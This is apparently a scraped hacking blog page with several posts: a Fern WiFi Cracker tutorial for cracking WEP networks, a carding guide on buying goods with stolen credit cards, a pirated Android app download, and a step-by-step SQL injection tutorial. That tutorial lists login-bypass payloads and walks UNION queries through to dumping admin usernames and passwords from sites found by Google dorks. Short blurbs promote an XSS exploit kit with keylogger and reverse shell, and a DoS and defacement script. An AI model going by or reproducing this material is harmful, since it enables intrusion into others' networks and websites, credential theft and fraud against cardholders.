• Room :- Hack2Wwworld
  • Your Name :- _________
  • Password :- BlackBerry1

Hack Wifi Using Fern Wifi Cracker Ttutorial with Pics]

Category : , 6





Instaling The Cracker:
After downloading place it on the desktop. And then double click it. After that ubuntu software center will open. Hit install as usual and put your password of admin if asked.
After getting it installed, Now you have to open it in admin privileges thus run terminal. And enter this command.

sudo python /usr/local/bin/Fern-Wifi-Cracker/
Type password and hit enter,it will look like this...

Using The cracker For WEP:

When first time the cracker opens you can have it updated if avialable as shown in the screen shot below:

Now select the interface like this:

Now after sometime a dialog box will open just click OK:

Enabling Xterms i.e.cracking network with client (optional)
Doubleclick in any area of the main window.
A window call Access Point Scan Preferences opens.
Click the Enable XTerms checkbox.
Click the Ok botton:

Now Xterms is enabeld

Now back to cracking....

Click the refresh button to load monitor interfaces. Then hit scan button, its for dual functioning mean, at first hit it will start scanning and again if you hit it it will stop scanning.

If you did the part with enabling XTerm - two popups will appear. Since this tutorial will only show WEP cracking you can close the one named FERN (WPA SCAN). Now let***8217;s have a look at the window called FERN (WEP SCAN). We need a accesspoint with a client connected to it. At the top half of the screen we see all the accesspoints in the area, and a lot of information about them. At the bottom of the window we see that a client is connected to a Accesspoint with the BSSID 00:13:f7:61:24A. If we compare this list in the top of the screen we will see that the name of this Accesspoint is SMC.So now we know that the accesspoint SMC have a client connected.

When any WIFI network with WEP and WPA will be found by FERN it will be displayed in the cracker. You have to hit button of WEP inorder to crack the password of the WIFI network.

After hitting the activation button of the WEP attack. What happens can be seen in screen shots below:

Select the type of attack you want!!!If you found SMC in scanning.Do the SMC attack!!!!
Click the Attack bottom and wait for the magic to happen.

Sit back and wait for the key to the network to appear!

Enjoy Cracking WEP...

Carding Tutorial with Sites and Bins

Category : 3

Hi friends i want to give new members a simple and
to the point Carding Tutorial no long or off the topic talks. So lets Start.

1. Always use Socks5 of the same state if possible same city of cc address.

if you not have premium account than here are some free socks sites here.

Socks checker here.

Mac Address Software here.

2. Always clear all cookies and history of browser before you start carding.
download here.

3. Always make new accounts on the site or ac which have good feedbacks. If
there has been many rejected or declined orders in the account chances of
success are less.

4. Find some easy cardable sites. If you not have download here.

5. Find some Non verified bins as they require no password. if you not have
download here.

6. Check CC if it is live or dead. If you not have checker
some free and paid cc and other checker links downlod here.

7. Always start to card with amount from cc if balance is good than go for big amount.
Sometime you try to card big amount and order not success and you think cc dead.

8. Always choose for normal shipping not fast and high paid courier
as it can be suspicious.

9. If you are carding from international site and cc is of another country

than choose item as gift and write a good message as "Dear as I am not able
to come on your birtday Sorry for than and Sending you your birthday Gift."

10. If you carding from a International site then don't choose fast shipping
as it will cost you a heavy import duty. I seen sometime in few countries
import duty cost more than Original value of Item.

11.Don't try to use Same Address again and again it may be Blacklisted.
and next orders will be cancelled.

12. It is better to use Drop to for your safety but carefully as there are
many rippers their.

13. Always card items which are of your use or easily resell able. Don't

card useless item just for in the name of carding.

OK guys I think it will be helpful for you Guys.

hepled you. If anyone copy paste my tutorial than atleast give me credit.

Optimized Your Android with AutoKiller Memory Optimizer PRO v8.4.2 APK Free Download

Category : , , 1

AutoKiller Memory Optimizer PRO is one of the awesome Memory Booster for your Android Mobile nowadays.This application is very useful and being the most favorite application. As the android user, you are really recommended to apply this application in your android device.
This app offers different features from the other apps for your Android device. 

AutoKiller Memory Optimizer PRO 
AutoKiller Memory Optimizer is not a regular task manager, it is an award winner minfree tweaker, it fine tunes android systems inner memory manager to keep your device fast over time. As a side effect it also lowers battery consumption. Also includes a manual process/service manager. AutoKiller Memory Optimizer speeds up your rooted device and makes your battery last longer!This is the PRO key for AutoKiller Memory Optimizer. 

Features of AutoKiller Memory Optimizer PRO :
  •     no ads
  •     Chuck Norris mode enabled
  •     apply kernel tweaks on boot
  •     alternate preset (while screen is off)
  •     all widgets
  •     quick restart
  •     memory reclaim

What's in this version : (Updated : Mar 19, 2013)

  •     fixed startup issue
  •     fixed widget ram display if free ram is over 999mb
  •     fix OOM groups if values are extreme
  •     non granted root access warning
  •     avoid ANRs and speed up startup
  •     better memory reclaim feedback
  •     application icons are not preloaded

Required Android O/S : 1.6+
Size :1.38 MB

Installation Method 

  • Copy 3 files in AutoKiller PRO v2.0.1 TB RAR to Titaniumbackup folder > Restore 'App+Data'
  • Install AutoKiller Memory Optimizer APK

If you face any problem in Downloading OR Installations Click on this Link For Tutorial

Password =

Download Now !



My SQL Injection Complete Tutorial :)

Category : , 3

Hello every one .
I am going to share with one of the best of my tutorials here .

Now Let's begin!!

Sql injection (aka Sql Injection or Structured Query Language Injection) is the first step in the entry to exploiting or hacking websites. It is easily done and it is a great starting off point. Unfortunately most sqli tutorials suck, so that is why I am writing this one. Sqli is just basically injecting queries into a database or using queries to get authorization bypass as an admin.

Things you should know :
Data is in the columns and the columns are in tables and the tables are in the database .
Just remember that so you understand the rest .

Bypassing admin log in
Gaining auth bypass on an admin account.

Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection. 
here is the best:


Now what to do once we get to our site.
the site should look something like this :

so what we do here is in the username we always type "Admin"
and for our password we type our sql injection

here is a list of sql injections

' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

So your input should look like this

that will confuse the site and give you authorisation to enter as admin

If the site is vulnerable than you are in Biggrin

Finding Sites to Inject

Finding SQLI Vulnerable sits is extremely easy all you need to do is some googling. The first thing you need to do are find some dorks. 
Download SQLI dorks list from here :

PS:I didn't put them in the thread because i passed count limit...
Pick one of those dorks and add inurl: before it (If they do not already have it) and then copy and paste it into google. Pick one of the sites off google and go to it.
For example the url of the page you are on may look like this :


To check that it is vulnerable all you have to do is add a '

So our link should look like that :


Press enter and you get some kind of error. The errors will vary...

Our page should look like that :

[Image: vulnerrorcopy.jpg]

After you find your vulnerable site the first step you need to take is to find the number of columns. The easiest way to do this is writing "order by " column number and we add "--" after the number.
Our link should look like that :

Quote: order by 15--

If you get an error that means you should lower the number of columns .
Let's try 10.

Quote: order by 10--

The page opened normally that means the number of columns is between 10 and 14.
We try now 11.

Quote: order by 11--

The page opened normally too...
Let's try 12.

Quote: order by 12--

We got error . That means the columns number is 11 because we got error on 12 and 11 opened normally .

Finding Accessible Columns 
Now that we have the number of columns we need to get the column numbers that we can grab information from.
We can do that by adding a "-" before the "10" replacing the " order by # " with "union all select " and columns number
Our link should look like that :

Quote: union all select 1,2,3,4,5,6,7,8,9,10,11--

We should get numbers .

Our page should look like that :]

[Image: vulncolumnscopy.jpg]

For the end part of the url, (1,2,3,4,5,6,7,8,9,10,11) You put the number of columns you found in the first step. Since I found that the site I was testing had 11 columns, I put 1,2,3,4,5,6,7,8,9,10,11--
These numbers are the colum numbers we can get information from. We will replace them later with something else so write them down if you want.

Getting Database Version
We found that column 8 , 3 , 4 and 5 are vulnerable so we will use them to get the database version .
Why Do We Do That?
If database is under 5 that means we will have to guess the tables names
To do that we need to replace one of the vulnerable columns by "@@verion"
Let's take column 8.
Our link should look like that :

Quote: union all select 1,2,3,4,5,6,7,@@version,9,10,11--

The page should look like that :]

Image has been scaled down 12% (907x681). Click this bar to view original image (1024x768). Click image to open in new window.
Image has been scaled down 12% (907x681). Click this bar to view original image (1024x768). Click image to open in new window.
[Image: dbversioncopy.jpg]

In our case we got "5.0.77" its >5 so we can continue.

Now we need to get the table name we want to access :
To do it we need to replace "@@version" with "table_name" and add after the last columns number "from information_schema.tables" and add the "--" in the end .
Link should be like that:

Quote: union all select 1,2,3,4,5,6,7,table_name,9,10,11 from information_schema.tables--

Page should look like that :]

[Image: tablenamescopy.jpg]

Now we will search the table we want to access .
We should fine something with admin on it and in our case it's tbladmin

[Image: tblhcopy.jpg]

Now we need to get the ASCII value of "tbladmin".
What is ASCII?
Now to get the ASCII value of "tbladmin" go to that site :

[Image: acsii1copy.jpg]

Now enter in first box the table name wich is "tbladmin" in our case and click convert to ASCII.
You will get as value that :


Now remove the characters as & # ; and we add a comma "," between each number .
It should be like that:


[Image: acsii2copy.jpg]

Now we replace in the URL the "table_name" to "column_name" and change "information_schema.tables" to "information_schema.columns and add "where table_name=char(ASCII value)--
in our case at place of (ASCII value) we put (116,98,108,97,100,109,105,110)--
Our URL should look like that :

Quote: union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=char(116,98,108,97,100,109,105,110)--

Our page should be like that:

[Image: columnsmcopy.jpg]

Now we search for the columns named "username" and "password" or something like that .
In our case it is "username" and "password".
Now we can delete most of the URL .
Remove everything after the 11 and add : "from tbladmin" And replace "column_name" with "concat(username,0x3a,password)
0x3a is the ASCII value of a : so we can separate the username from the password.
Our URL should look like that:

Quote: union all select 1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11 from tbladmin

Our page should look like that :

[Image: adminandpass.jpg]

And you're done the username is ishir and password ishir123
Some times password is encrypted with Hashes .
Use my HASH detector to know what it is and decrypt online.

And We're Done !

Xenotix XSS E-x-p-l-o-i-t Framework 2013 v2

Category : 1

Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications. This tool can inject codes into a webpage which are vulnerable to XSS. It is basically a payload list based XSS Scanner and XSS Exploitation kit. It provides a penetration tester the ability to test all the XSS payloads available in the payload list against a web application to test for XSS vulnerabilities. The tool supports both manual mode and automated time sharing based test modes. The exploitation framework in the tool includes a XSS encoder, a victim side XSS keystroke logger, an Executable Drive-by downloader and a XSS Reverse Shell. These exploitation tools will help the penetration tester to create proof of concept attacks on vulnerable web applications during the creation of a penetration test report.


Built in XSS Payloads
XSS Key logger
XSS Executable Drive-by downloader
Automatic XSS Testing
XSS Encoder
XSS Reverse Shell (new)


Anonymous Tools

Category : 0

[Image: anonme2.png]
Description {bash script} V1.0
Operative Systems Suported: Linux


description of the script *
this script makes it easy tasks such as DoS attacks, change you MAC address, inject XSS on target website, file upload vulns, MD5 decrypter, webcrawler (scan websites for vulns) and we can use WGET to download files from target domain or retrieve the all website...


1. ping target or webdomain
2. show my ip address
3. browse anonimousy
4. retrieve metadata from webdomain
5. see/change mac address
6. generate/change mac address [manual]
7. open router config page
8. slowloris DDoS
9. DDoS javascript website
10. curent world DDoS attack map [honeypots]
11. see if target is ip or down
12. web crawler vuln scanner
13. xss injector tool
14. website upload vuln [deface]
15. MD5 decrypter tool


HMA Proxy Grabber

Category : 1

Powered by Blogger.